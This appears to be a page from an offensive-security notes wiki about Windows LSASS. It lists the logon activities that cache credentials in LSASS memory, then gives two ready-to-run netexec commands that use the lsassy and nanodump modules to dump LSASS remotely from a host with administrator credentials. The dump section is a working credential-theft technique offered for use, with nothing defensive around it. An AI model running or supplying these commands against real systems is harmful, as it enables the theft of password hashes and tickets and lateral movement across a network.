LSASS

Local Security Authority Subsystem Service

When does LSASS store credentials?

Credentials are cached to LSASS whenever a user authenticated in an interactive manner. The following types of activity will put the user’s credential material into memory:

Starting a local session
Starting an RDP session
Running a task via RunAs
Running an active Windows Service
Running a scheduled task
Running a batch job
Running a task by utilizing a remote administration tool

Dump

Using Lsassy

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy

Using nanodump

nxc smb 192.168.255.131 -u administrator -p pass -M nanodump

PreviousDPAPI NextLSA

Last updated 1 year ago